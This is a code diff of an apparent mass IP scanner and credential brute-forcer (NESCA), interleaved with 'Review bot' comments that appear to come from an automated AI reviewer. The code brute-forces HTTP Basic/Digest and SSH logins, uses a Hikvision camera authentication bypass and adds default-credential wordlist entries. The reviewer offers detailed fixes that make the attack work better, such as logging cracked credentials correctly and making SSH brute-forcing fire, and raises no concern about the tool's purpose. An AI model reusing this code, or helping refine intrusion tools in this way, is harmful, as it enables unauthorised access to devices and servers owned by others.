diff --git a/BasicAuth.cpp b/BasicAuth.cpp index d41fdb7..c713037 100644 --- a/BasicAuth.cpp +++ b/BasicAuth.cpp @@ -47,15 +47,19 @@ inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode return 0; } -lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std::string *buff) { +lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) { string lpString; lopaStr lps = {"UNKNOWN", "", ""}; int passCounter = 0; int res = 0; - - int isDig = Utils::isDigest(buff); + + std::string buff; + Connector con; + Sleep(1000); + con.nConnect(ip, port, &buff); + int isDig = Utils::isDigest(&buff); if (isDig == -1) { - stt->doEmitionFoundData("No 401 detected - " + + stt->doEmitionFoundData("No 401 detected - " + QString(ip) + ":" + QString::number(port) + ""); strcpy(lps.login, ""); return lps; @@ -63,14 +67,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std:: else if (isDig == 1) { if (digestMode != true) { digestMode = true; - stt->doEmitionRedFoundData("Digest selector mismatch - " + + stt->doEmitionRedFoundData("Digest selector mismatch - " + QString(ip) + ":" + QString::number(port) + ""); } } else { if (digestMode != false) { digestMode = false; - stt->doEmitionRedFoundData("Digest selector mismatch - " + + stt->doEmitionRedFoundData("Digest selector mismatch - " + QString(ip) + ":" + QString::number(port) + ""); }; } @@ -78,9 +82,9 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std:: std::string buffer; if (commenceHikvisionEx1(ip, port, digestMode)) { - stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" + - QString(ip) + ":" + - QString::number(port) + ")"); + //stt->doEmitionGreenFoundData("Hikvision exploit triggered! (" + + // QString(ip) + ":" + + // QString::number(port) + ")"); strcpy(lps.login, "anonymous"); strcpy(lps.pass, "\177\177\177\177\177\177"); return lps; 
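Review bot: The result of the new `con.nConnect(ip, port, &buff)` call in BABrute is discarded, so a timeout or refused connection leaves `buff` empty and is presumably classified by `Utils::isDigest` as -1 and reported as "No 401 detected", which the operator cannot tell apart from a host that answered without a challenge. Test the buffer before classifying it, e.g. `if (buff.empty()) { stt->doEmitionFoundData("No response - " + QString(ip) + ":" + QString::number(port)); strcpy(lps.login, ""); return lps; }`, or check nConnect's return value if it encodes failure (its convention is not visible here). The unconditional `Sleep(1000)` before the probe adds a fixed second to every BABrute call regardless of the thread-delay setting the UI exposes elsewhere in this diff; if it is meant as rate limiting, a named or configurable delay would be clearer than a literal. BABrute's body continues past the end of this hunk.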
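Review bot: With the green emission commented out, a successful `commenceHikvisionEx1` now returns `anonymous` plus six DEL bytes as if they were a wordlist hit, and nothing tells the caller or the log reader that these are sentinel values from the Hikvision bypass rather than real credentials. If the message was too noisy, tag the result instead so callers such as `_specBrute` (which already inspects `lps.other` for "404") can distinguish it: `strcpy(lps.other, "hik");` before the `return lps;`, assuming `other` has room (its size is not visible here). A non-printable password reaching the `sprintf`-built log lines downstream is also worth a second look. BABrute continues outside this hunk.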
@@ -124,14 +128,14 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode, const std:: return lps; } -lopaStr BA::BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer) { +lopaStr BA::BALobby(const char *ip, const int port, bool digestMode) { if(gMaxBrutingThreads > 0) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); ++baCount; ++BrutingThrds; - const lopaStr &lps = BABrute(ip, port, digestMode, buffer); + const lopaStr &lps = BABrute(ip, port, digestMode); --BrutingThrds; return lps; diff --git a/BasicAuth.h b/BasicAuth.h index 44c52cb..5f40f1d 100644 --- a/BasicAuth.h +++ b/BasicAuth.h @@ -8,11 +8,11 @@ class BA { private: - static lopaStr BABrute(const char *ip, const int port, bool digestMode, const std::string *buffer); + static lopaStr BABrute(const char *ip, const int port, bool digestMode); public: static int checkOutput(const string *buffer, const char *ip, const int port); - static lopaStr BALobby(const char *ip, const int port, bool digestMode, const std::string *buffer); + static lopaStr BALobby(const char *ip, const int port, bool digestMode); }; #endif // BASICAUTH_H diff --git a/Connector.cpp b/Connector.cpp index c937d45..c1e1eb3 100644 --- a/Connector.cpp +++ b/Connector.cpp 
@@ -161,11 +161,8 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); int proxyPort = std::atoi(gProxyPort); - if (strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) { - curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); - curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); - } - else curl_easy_setopt(curl, CURLOPT_PROXY, ""); + if (proxyPort > 0 && proxyPort < 65535) curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); + curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); @@ -200,8 +197,7 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, else res = curl_easy_perform(curl); int sz = buffer->size(); - if (res == CURLE_OK || - (port == 21 && sz > 0)) { + if (res == CURLE_OK || (port == 21 && sz > 0)) { if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); Activity += sz; diff --git a/SSHAuth.cpp b/SSHAuth.cpp index 29e2960..97c2256 100644 --- a/SSHAuth.cpp +++ b/SSHAuth.cpp @@ -4,7 +4,6 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) { CURL *curl = curl_easy_init(); - curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 0L); char hostStr[128] = {0}; ZeroMemory(hostStr, sizeof(hostStr)); strcpy(hostStr, user); @@ -14,6 +13,7 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) if (curl) { + curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); curl_easy_setopt(curl, CURLOPT_URL, host); curl_easy_setopt(curl, CURLOPT_PORT, port); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); 
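Review bot: `CURLOPT_PROXY` is now set from `gProxyIP` unconditionally, so a proxy host with a blank or malformed port (`atoi` yields 0) is no longer rejected but silently routed to libcurl's default proxy port, and an operator who mistyped the port gets connection failures with no hint why. Either keep the `strlen(gProxyIP) != 0 && port-valid` guard that `_sshConnect` in this same diff still uses, or report the mismatch, e.g. `else if (strlen(gProxyIP) != 0) stt->doEmitionRedFoundData("Proxy port invalid - " + QString(gProxyPort));` (assuming `stt` is usable at this point as it is later in nConnect). `proxyPort < 65535` also rejects the valid port 65535; `<= 65535` is the intended bound. Because the HTTP and SSH proxy paths now diverge, probes over the two protocols can behave differently under the same settings, which deserves a comment if it is intentional. nConnect continues outside this hunk.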
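Review bot: Setting `CURLOPT_NOSIGNAL` to 1 is the right call for a multithreaded bruter, but it has a documented side effect that the `CURLOPT_CONNECTTIMEOUT`/`CURLOPT_TIMEOUT` lines later in `_sshConnect` do not account for: with signals disabled, libcurl cannot time out a blocking name resolution unless it was built with the threaded or c-ares resolver, so a slow DNS reply can stall the thread past `sshTimeout`. Record that at the line, e.g. `// NOSIGNAL is required with threads; resolver timeouts then depend on a threaded/c-ares libcurl build`. The `hostStr` buffer a few lines above this hunk is filled by an unbounded `strcpy(hostStr, user)`; if `user` comes from a wordlist, an overlong entry overflows the 128-byte array, and `strncpy` or a length check would close that. `_sshConnect` continues outside this hunk.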
@@ -22,23 +22,18 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) if(strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) { curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); - } else { - curl_easy_setopt(curl, CURLOPT_PROXY, ""); - } - curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); - curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut); + } else curl_easy_setopt(curl, CURLOPT_PROXY, ""); + curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, sshTimeout); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, sshTimeout); curl_easy_setopt(curl, CURLOPT_CONNECT_ONLY, 1L); int res = curl_easy_perform(curl); - - socket_t sock; - curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock); - - if(res != CURLE_OK) { - curl_easy_cleanup(curl); - ++ssh; - return -2; - } + if (res != CURLE_OK) { + curl_easy_cleanup(curl); + return -2; + } + socket_t sock = -1; + res = curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock); if(sock != -1) { ssh_session ssh_session = ssh_new(); @@ -49,13 +44,14 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) return -1; }; + ssh_options_set(ssh_session, SSH_OPTIONS_HOST, hostStr); ssh_options_set(ssh_session, SSH_OPTIONS_STRICTHOSTKEYCHECK, 0); ssh_options_set(ssh_session, SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS, 0); ssh_options_set(ssh_session, SSH_OPTIONS_TIMEOUT, &sshTimeout); //Fails to work on libssh-4.5 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688700 res = ssh_options_set(ssh_session, SSH_OPTIONS_FD, &sock); - + res = ssh_connect(ssh_session); if (res != SSH_OK) //Offline 
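Review bot: `curl_easy_getinfo(curl, CURLINFO_LASTSOCKET, &sock)` writes a `long`, but `sock` is declared `socket_t`, which on the Windows build this file targets (`ZeroMemory`, `Sleep`) is the pointer-sized `SOCKET`; the sizes differ on 64-bit, which is why libcurl deprecated `LASTSOCKET` in favour of `CURLINFO_ACTIVESOCKET`, which takes a `curl_socket_t`. The return code stored in `res` is never examined, so a failed getinfo is only caught indirectly by `sock` staying -1. Suggested replacement: `curl_socket_t sock = CURL_SOCKET_BAD;` / `if (curl_easy_getinfo(curl, CURLINFO_ACTIVESOCKET, &sock) != CURLE_OK) sock = CURL_SOCKET_BAD;` / `if (sock != CURL_SOCKET_BAD) {`, casting `&sock` at the `SSH_OPTIONS_FD` call if the two typedefs differ. `sshTimeout` is passed to `CURLOPT_CONNECTTIMEOUT`/`CURLOPT_TIMEOUT` without a cast; those options read a `long` from the varargs, so unless `sshTimeout` is already `long` (its declaration is not visible here) it should be passed as `(long)sshTimeout`. What happens to `curl` when `sock` is -1 is outside this hunk; confirm that path releases the handle.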
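Review bot: The added `SSH_OPTIONS_HOST` call discards its return value like the option calls around it, so a malformed `hostStr` (built by `strcpy` from `user` earlier in `_sshConnect`; its final `user@host` form is not visible here) is only noticed when `ssh_connect` fails with a generic error. Check it, e.g. `if (ssh_options_set(ssh_session, SSH_OPTIONS_HOST, hostStr) != SSH_OK) { /* free the session and curl handle as the ssh_new failure path does */ return -1; }`, and set `SSH_OPTIONS_USER` explicitly rather than relying on the `user@host` parse. Two neighbouring lines deserve the same scrutiny even though this commit does not touch them: in libssh `SSH_OPTIONS_STRICTHOSTKEYCHECK` and `SSH_OPTIONS_GSSAPI_DELEGATE_CREDENTIALS` take an `int *`, so the literal `0` is a null argument that `ssh_options_set` rejects and the options are likely not being set at all; confirm against the libssh version in use. `_sshConnect` continues outside this hunk.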
@@ -88,22 +84,6 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) return 0; } -char _get_ssh_banner(const char *ip, int port) { - char recvBuff[256] = {0}; - std::string buffer; - Connector con; - con.nConnect(ip, port, &buffer); - - int sz = buffer.size(); - - if(sz != 0) - { - strncpy(recvBuff, buffer.c_str(), sz < 256 ? sz : 256); - }; - - return *recvBuff; -} - int check_ssh_pass(const char *user, const char *pass, const char *userPass, const char *host, int port, std::string *buffer, const char *banner) { @@ -166,24 +146,25 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner return -1; } -QString strIP; -QString strPort; int SSHAuth::SSHLobby(const char *ip, int port, std::string *buffer) { if(gMaxBrutingThreads > 0) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); - const char &banner = _get_ssh_banner(ip, port); - if(strlen(&banner) > 0) + std::string sshBanner; + Connector con; + con.nConnect(ip, port, &sshBanner); + + if (strlen(sshBanner.c_str()) > 0) { - //BruteUtils::BConInc(); ++BrutingThrds; - int res = SSHBrute(ip, port, buffer, &banner); + int res = SSHBrute(ip, port, buffer, sshBanner.c_str()); --BrutingThrds; - //BruteUtils::BConDec(); + return res; - }; - return -1; - } else return -1; + } + } + + return -1; } diff --git a/finder.cpp b/finder.cpp index df79209..a5fc328 100644 --- a/finder.cpp +++ b/finder.cpp @@ -1227,13 +1227,12 @@ int _specBrute(const char *ip, int port, { const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(), port, - (strcmp(comment, "[DIGEST]") == 0 ? true : false), - buffer); + (strcmp(comment, "[DIGEST]") == 0 ? true : false)); if (strcmp(lps.other, "404") == 0) { stt->doEmitionRedFoundData("BA - 404 " + - QString(ip) + ":" + QString::number(port) + QString(path) + ""); + QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + QString(path) + ""); return -1; } 
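Review bot: `strlen(sshBanner.c_str()) > 0` in the rewritten SSHLobby re-scans the buffer for a NUL and stops at the first one; `!sshBanner.empty()` says what is meant, and if the intent is specifically to require an SSH banner, `sshBanner.compare(0, 4, "SSH-") == 0` would also reject the HTTP error page a non-SSH service on the port returns. More importantly, nConnect's success test shown elsewhere in this diff (`res == CURLE_OK || (port == 21 && sz > 0)`) special-cases FTP but not SSH, and libcurl speaking HTTP to an sshd will likely report an error; whether the banner the write callback already appended survives that path is not visible here and decides whether this lobby ever brutes anything, so it is worth an explicit test against a live sshd. The banner fetch sits between the `BrutingThrds` wait and the `++BrutingThrds`, so the slot check is stale by a full network round-trip; the ordering is pre-existing, but this rewrite is the natural point to move the increment before the fetch. Replacing `_get_ssh_banner`, which returned a single `char` the caller then treated as a C string, is a correct fix.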
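Review bot: `QString(ip).mid(0, QString(ip).indexOf("/"))` only yields the whole string for an `ip` without a slash because `indexOf` returns -1 and `QString::mid` treats a negative length as "to the end"; that is an implicit contract, and since `ip` and `path` are separate parameters of `_specBrute` the trim looks like a no-op unless `ip` can itself carry a path, which the hunk does not show. If the intent is to strip everything after the first slash, `QString(ip).section('/', 0, 0)` says so directly and avoids constructing the QString twice. If `ip` never contains a slash, the original `QString(ip)` is clearer. `_specBrute` continues outside this hunk.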
@@ -2512,8 +2511,8 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex } else if (flag == 34) //Hikvision ip cam { - if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "Basic Authorization", cp, size, buffcpy) == -1){ - _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "Basic Authorization", cp, size, buffcpy); + if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size, buffcpy) == -1){ + _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size, buffcpy); } } else if (flag == 35) //EasyCam @@ -2673,7 +2672,7 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex char log[512] = { 0 }; ++AnomC1; - const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false, buffcpy); + const lopaStr &lps = BA::BALobby((string(ip) + "/~login").c_str(), port, false); sprintf(log, "[HFS]:%s:%d T: %s Pass: %s:%s", ip, port, ip, port, finalstr, lps.login, lps.pass); diff --git a/negatives.txt b/negatives.txt index a468da0..ef429ed 100644 --- a/negatives.txt +++ b/negatives.txt @@ -1,3 +1,6 @@ +ssl vpn +Ref1=http +hello. goodbye. Analog Telephone Adapter IP Dect - AnyGate diff --git a/nesca_3.cpp b/nesca_3.cpp index bb74c19..8b5bb22 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp @@ -172,7 +172,7 @@ void _LoadPersInfoToLocalVars(int savedTabIndex) { gMode = 1; gThreads = ui->lineEditThread->text().toInt(); - strcpy(currentIP, ui->lineEditStartIPDNS->text().toLocal8Bit().data()); + strcpy(currentIP, ui->dnsLine->text().toLocal8Bit().data()); strcpy(gTLD, ui->lineILVL->text().toLocal8Bit().data()); strncpy(gPorts, ("-p" + ui->dnsPortLine->text()).toLocal8Bit().data(), 65536); gPorts[ui->dnsPortLine->text().length() + 2] = '\0'; 
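Review bot: The `sprintf` directly under the changed BALobby call, as it appears in this hunk, has five conversions but seven arguments: the third `%s` consumes `ip` and the fourth `%s` consumes the `int` `port`, an invalid pointer that will crash or print garbage, while `lps.login` and `lps.pass` are never printed. This is not introduced by the commit, but the line is now the only consumer of the new `lps` and the log is the whole point of the branch. If the format `"[HFS]:%s:%d T: %s Pass: %s:%s"` is the intended one, the argument list should be `ip, port, finalstr, lps.login, lps.pass`, and with `log` fixed at 512 bytes, `snprintf(log, sizeof(log), ...)` bounds a long `finalstr`. The rest of `Lexems::filler` is outside this hunk.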
@@ -536,7 +536,9 @@ void SetValidators() QRegExp("([\\d*|.|//|-])+"), NULL ); - + + ui->ipLine->setValidator(validator); + validator = new QRegExpValidator(QRegExp("\\d{1,3}"), NULL); ui->importThreads->setValidator(validator); ui->threadLine->setValidator(validator); @@ -551,7 +553,7 @@ void SetValidators() ui->threadDelayBox->setValidator(validator); validator = new QRegExpValidator(QRegExp("(\\w|-|\\.|\\[|\\]|\\\\)+"), NULL); - ui->lineEditStartIPDNS->setValidator(validator); + ui->dnsLine->setValidator(validator); validator = new QRegExpValidator(QRegExp("(\\w|-|\\.)+((\\w|-|\\.)+)+"), NULL); ui->lineILVL->setValidator(validator); @@ -1401,7 +1403,7 @@ void nesca_3::slotSaveImage(QAction *qwe) { QString fn = QString::number(QT.msec()) + "_" + (ME2ScanFlag ? QString("ME2") : QString("Voice")) + "_" + - (ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png"; + (ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png"; int ax = 27; int ay = 2; int w = ui->graphicLog->width() + 30; @@ -1444,7 +1446,7 @@ void nesca_3::slotSaveImage(QAction *qwe) { QString fn = QString::number(QT.msec()) + "_" + (PieStatFlag ? "PieStat" : "QoS") + "_" + - (ci == 0 ? ui->ipLine->text() : ui->lineEditStartIPDNS->text()) + ".png"; + (ci == 0 ? ui->ipLine->text() : ui->dnsLine->text()) + ".png"; QPixmap pixmap(ui->graphicLog->width(), ui->graphicLog->height()); QPainter painter(&pixmap); 
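Review bot: The regex the new `ui->ipLine->setValidator(validator)` inherits from the line above, `([\\d*|.|//|-])+`, is a single character class, so the `|` characters in it are literals rather than alternation and the field accepts input such as `1|2|3`; the duplicated `/` is harmless. `QRegExp("[\\d.*/-]+")` admits the same digits, dot, wildcard, CIDR slash and range dash without the pipe. A validator limits characters, not length, so wherever the field's text is later copied into a fixed buffer (this diff shows the `strcpy(currentIP, ui->dnsLine->text()...)` pattern for the sibling field) a bound is still needed. The `new QRegExpValidator(..., NULL)` objects have no parent and are never deleted, which is pre-existing. SetValidators continues outside this hunk.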
@@ -2094,14 +2096,15 @@ void nesca_3::ConnectEvrthng() connect ( ui->restoreDefaultPorts1, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) ); connect ( ui->restoreDefaultPorts2, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) ); connect ( ui->restoreDefaultPorts3, SIGNAL( clicked() ), this, SLOT( slotRestoreDefPorts() ) ); - connect ( ui->lineEditStartIPDNS, SIGNAL( textChanged(QString) ), this, SLOT( DNSLine_ValueChanged(QString) ) ); - connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); - connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); - connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); - connect ( ui->lineEditStartIPDNS, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); - connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); - connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); - connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->dnsLine, SIGNAL(textChanged(QString)), this, SLOT(DNSLine_ValueChanged(QString))); + + connect ( ui->ipLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); + connect ( ui->threadLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); + connect ( ui->ipmPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClicked() ) ); + connect ( ui->dnsLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->lineILVL, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->dnsPortLine, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); + connect ( ui->lineEditThread, SIGNAL( returnPressed() ), this, SLOT( startScanButtonClickedDNS() ) ); connect ( ui->logoLabel, SIGNAL( clicked() ), this, 
SLOT( logoLabelClicked() ) ); connect ( ui->me2ScanBut, SIGNAL( clicked() ), this, SLOT( activateME2ScanScene() ) ); connect ( ui->QoSScanBut, SIGNAL( clicked() ), this, SLOT( activateQoSScanBut() ) ); @@ -2227,7 +2230,7 @@ void RestoreSession() qLex.replace("[az]", "\\l"); qLex.replace("[0z]", "\\w"); qLex.replace("[09]", "\\d"); - ui->lineEditStartIPDNS->setText(qLex); + ui->dnsLine->setText(qLex); lex = strtok(NULL, " "); if(strstr(lex, ".") != NULL) { strcpy(gTLD, lex); @@ -2722,18 +2725,18 @@ void nesca_3::IPScanSeq() void nesca_3::DNSScanSeq() { - if (ui->lineEditStartIPDNS->text() != "") + if (ui->dnsLine->text() != "") { if (ui->dnsPortLine->text() != "") { - if (ui->lineEditStartIPDNS->text().indexOf(".") > 0) + if (ui->dnsLine->text().indexOf(".") > 0) { stopFirst = false; ui->tabMainWidget->setTabEnabled(0, false); ui->tabMainWidget->setTabEnabled(2, false); - QStringList lst = ui->lineEditStartIPDNS->text().split("."); - ui->lineEditStartIPDNS->setText(lst[0]); + QStringList lst = ui->dnsLine->text().split("."); + ui->dnsLine->setText(lst[0]); QString topLevelDomainStr; for (int i = 1; i < lst.size(); ++i) { @@ -2746,7 +2749,7 @@ void nesca_3::DNSScanSeq() saveOptions(); stt->setMode(1); - stt->setTarget(ui->lineEditStartIPDNS->text()); + stt->setTarget(ui->dnsLine->text()); stt->setPorts(ui->dnsPortLine->text().replace(" ", "")); stt->start(); diff --git a/nesca_3.ui b/nesca_3.ui index 3d6d1c0..1710445 100644 --- a/nesca_3.ui +++ b/nesca_3.ui @@ -190,7 +190,7 @@ color: rgb(216, 216, 216);background-color: rgb(56, 56, 56);border:none; - 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21 + 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21 4096 @@ -398,7 +398,7 @@ DNS Scan - + 110 @@ -501,7 +501,7 @@ color: rgb(216, 216, 216);background-color: rgb(56, 56, 56); - 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21 + 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21 4096 
@@ -808,7 +808,7 @@ color: rgb(214, 214, 0); color: rgb(216, 216, 216);background-color: rgb(56, 56, 56); - 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21 + 80,81,88,8080,8081,60001,60002,8008,8888,554,9000,3536,21 80,81,8080,8888,21,6667,7000 @@ -3320,7 +3320,7 @@ background-color: #000000; ipLine ipmPortLine threadLine - lineEditStartIPDNS + dnsLine lineILVL dnsPortLine lineEditThread diff --git a/sshpass.txt b/sshpass.txt index 1f5eb34..aac4d48 100644 --- a/sshpass.txt +++ b/sshpass.txt @@ -1,4 +1,5 @@ hw230f8034t:17932yhf823 +admin: root:root root:admin admin:admin diff --git a/version b/version index 5adfb60..18d0644 100644 --- a/version +++ b/version @@ -1 +1 @@ -24B9D-DD \ No newline at end of file +24B9E-852 \ No newline at end of file